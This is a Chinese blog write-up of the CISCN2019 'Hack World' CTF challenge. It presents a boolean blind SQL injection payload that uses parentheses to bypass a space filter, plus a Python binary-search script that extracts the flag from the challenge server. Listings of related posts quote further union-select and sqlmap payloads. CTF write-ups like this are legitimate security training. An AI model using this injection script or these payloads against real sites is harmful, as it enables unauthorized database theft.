[CISCN2019 华北赛区]Hack World

最新推荐文章于 2024-06-05 15:00:00 发布
最新推荐文章于 2024-06-05 15:00:00 发布
阅读量140 收藏
点赞数
分类专栏: SQL注入
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/114609803
版权

应该算是bool盲注

这题过滤了许多东西,建议Fuzz测试一下,and or # - union
但是()可以用 if也可以

尝试 id=(length(database())>4)是成功回显id=1结果

 payload="if(ascii(substr((select(flag)from(flag)),{},1))<{},1,2)".format(i,middle)

值得注意的是这里用 ()绕过空格
一个二分法的脚本:

import requests
url="http://b8f9001a-a646-4ff0-a940-8e7c928e9290.node3.buuoj.cn/index.php"
flag=""
for i in range(1,100):
    min=32
    max=128
    while 1:
        middle=min+((max-min)//2)
        if min == middle:
            flag+=chr(middle)
            print(flag)
            if chr(middle)=="}":
                exit()
            break
            

        payload="if(ascii(substr((select(flag)from(flag)),{},1))<{},1,2)".format(i,middle)
        data={'id':payload}
        res=requests.post(url=url,data=data).text
        #print(res)
        if "glzjin wants a girlfriend" in res:
            max=middle
        else:
            min=middle
D.MIND
关注
专栏目录
WP-CISCN2021
ce666666的博客
06-14 1万+
前言 这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。 Web 简单的注入 一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。 还是得靠sqlmap注入 Payload: 爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs 爆表:sqlmap.py –r txt –risk=3 –-level=3 –p password –D “数据库名
CISCN 华北赛区 Day1 Web2
kid的博客
06-14 2641
CISCN 华北赛区 Day1 Web2 前言 关注大佬的博客看到大佬又做了一道有意思的题还提供了环境,这里来体验下。 一看这个网站就很有意思…最近黑kunkun的可真多,前面0708那个漏洞github搜exp,下下来一运行 ,输出你打篮球真的很像CXK…过分…你打篮球才像CXK,你们全家打篮球都像CXK! 复现环境:https://github.com/CTFTraining/CISCN...
[CISCN2019 华北赛区 Day2 Web1]Hack World 布尔注入
m0_64180167的博客
09-30 232
错误的值 我们首先fuzz一下。确定了f 开头 我们开始写脚本。
CISCN2021_华南初赛_记录
ScyLamb的博客
05-16 1271
easy_sql hint:一个简单的sql注入题目 打开一个登录框,随便测试下,发现报错了 直接报错注入Payload打一波 失败,回显no,开始跑字典 过滤了 column和可以获取表名的表 如: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pQ9yJBow-1621160008407)(image/国赛.image/image-20210515151503088.png)] 尝试盲猜表名【后面发现sqlmap爆破表名也可以跑出来】 最后成功两个 users,fla
[CISCN2021]华北区_ctf_re_imnotavirus
qq_43583624的博客
06-21 1302
2021国赛CTF华北区_re_imnotavirus 题目来源和附件 Written by PoilZero(个人博客:http://poilzero.sipc115.club/) 同步转发到简书和CSDN 题目来源: 2021年第十四届全国大学生信息安全竞赛——创新实践能力赛 华北赛区 re方向第一题 imnotavirus 题目附件: https://poil.lanzoui.com/i0iImqjom6h 个人解题目录和部分所需程序: https://poil.lanzoui.com/i0
[CISCN2019 华北赛区 Day2 Web1]Hack World1
最新发布
2301_78919866的博客
06-05 850
[CISCN2019 华北赛区 Day2 Web1]Hack World1题解
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 785
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World
Senimo
12-08 519
BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World 启动环境: 提示了存在flag表与flag列,先输入正常内容1: 可以得到正常的回显,再测试2: 再输入999,得到错误提示: 输入2-1时,得到注入提示: 在判断数值型和字符型注入时,可以通过提交数学式的方式,例如:id=2/2,字符型返回id=2的内容,数字型则返回id=1的结果。 输入2/2判断注入类型: 得到正常回显,猜测为数字型的盲注,使用length()方法测试: (length(databas
练习7 Web [CISCN2019 华北赛区 Day2 Web1]Hack World
离暑假还有41天的博客
03-11 485
布尔注入 试了起码8次,才拿到完整的flag,循环的时候老是会漏字符,必须设置post请求的timeout = None,并且在post请求前添加sleep(0.07),否则可能出现漏掉字符的情况,这个0.07s还是一点点试出来的,有没有大神能解释一下为什么?
[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_41889600的博客
11-20 435
buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
qq_43618536的博客
07-03 562
BUUCTF的[CISCN2019 华北赛区 Day2 Web1]Hack World 1 盲注
[CISCN2019 华北赛区 Day2 Web1]Hack World题解
qq_52843575的博客
04-07 3368
[CISCN2019 华北赛区 Day2 Web1]Hack World题解 判断类型 进入页面很明显就是考sql注入,与此同时页面直接告诉你表面和列名均是flag,直接开始注入,常用的注入函数均被过滤,直接fuzz爆破,查看被过滤的具体情况 结果确定此题为sql中的布尔盲注(post传参),也同时发现一个问题,请求过快时,会被过滤掉请求 确认绕过方法 因为or被过滤,百度一波后,发现可以使用^异或来绕过 异或:相同为假,相异为真,简单来说就是 1^1=0 0^0=0 1^0=1 空格也被过滤,因此
CTFshow——萌新记忆
D.MIND 的博客
03-15 1478
一进来,看了前两篇悲惨记忆,忽记起我还要做题呢,于是赶紧寻找线索… 发现页面都没什么可利用的,尝试访问别的页面,用dirsearch可以扫描出/admin/目录,没错,是扫出目录而不是一个页面,所以访问的时候别忘记admin后面加/ (多么菜的领悟>_<) 来到一个登录页面,随手试试or和and,返回要报警的信息,用burp来Fuzz一下 发现and or # - if =等都被过滤了 但( ) || , substr length可以用,||可以代替or 那么就是bool盲注了 经过尝试是会发
CTFshow——sqli-labs
D.MIND 的博客
04-10 1320
草率地记录一下 1——字符型 id=-1' union select 1,database(),(select group_concat(flag) from ctfshow.flag )-- - 2——数字型 ?id=-1 union select 1,database(),(select group_concat(flagac) from ctfshow.flagaa )-- - (select group_concat(table_name) from information_schema.ta
CTFshow——SQL注入【Part 2】
D.MIND 的博客
03-20 1037
文章目录web201——web202——post提交web203——put方法web204——cookieweb205——`--safe-url`web206——web207——web208—— web201—— 题目: 使用--user-agent 指定agent 使用--referer 绕过referer检查 --referer="xxx.xxx" 指定referer 当--level参数设定为3或者3以上的时候会尝试对referer注入 --user-agent=AGENT 修改
CTFshow——SQL注入【Part 1】
D.MIND 的博客
03-10 911
web171—— 2' and 1=1 # 2' or 1=1 # 数据接口请求异常:parsererror 2' or 1=1 -- - 回显正常,且爆出所有信息,说明“-- -”其效果了 。“#”这种注释方式不成功 2' union select 1,2 -- - 数据接口请求异常:parsererror 2' union select 1,2,3 -- - 成功回显1,2,3 2' union select 1,database(),group_concat(table_name) fro
[NCTF2019]SQLi(Regexp注入)
D.MIND 的博客
04-25 858
文章目录分析Regexp注入盲注脚本总结: 又是一道考验写python脚本的题目,python学的真不咋地,看师傅们的脚本才知道一些点改怎么写… 分析 查询语句: sqlquery : select * from users where username='' and passwd='' 一开始真的尝试很多感觉不好绕,后来意识到前面username处可以用反斜杠将SQL语句的单引号转义,再之后就没头绪了,因为实在过滤了很多,之后尝试了看看有没有hint信息,在robots.txt处找到,提示看hint.
[GYCTF2020]Ezsqli(Mysql逐位比较)
D.MIND 的博客
04-23 623
前言 用到异或注入、bool盲注,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合盲注 文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结 这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的 一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想 异或注入就成了我的首选! 测试一下 id=1 ^ 1# Error
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。... ...因此,我们需要通过其他方式来获取flag。 ...我们可以尝试一些常见的Web漏洞,比如SQL注入、XSS等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值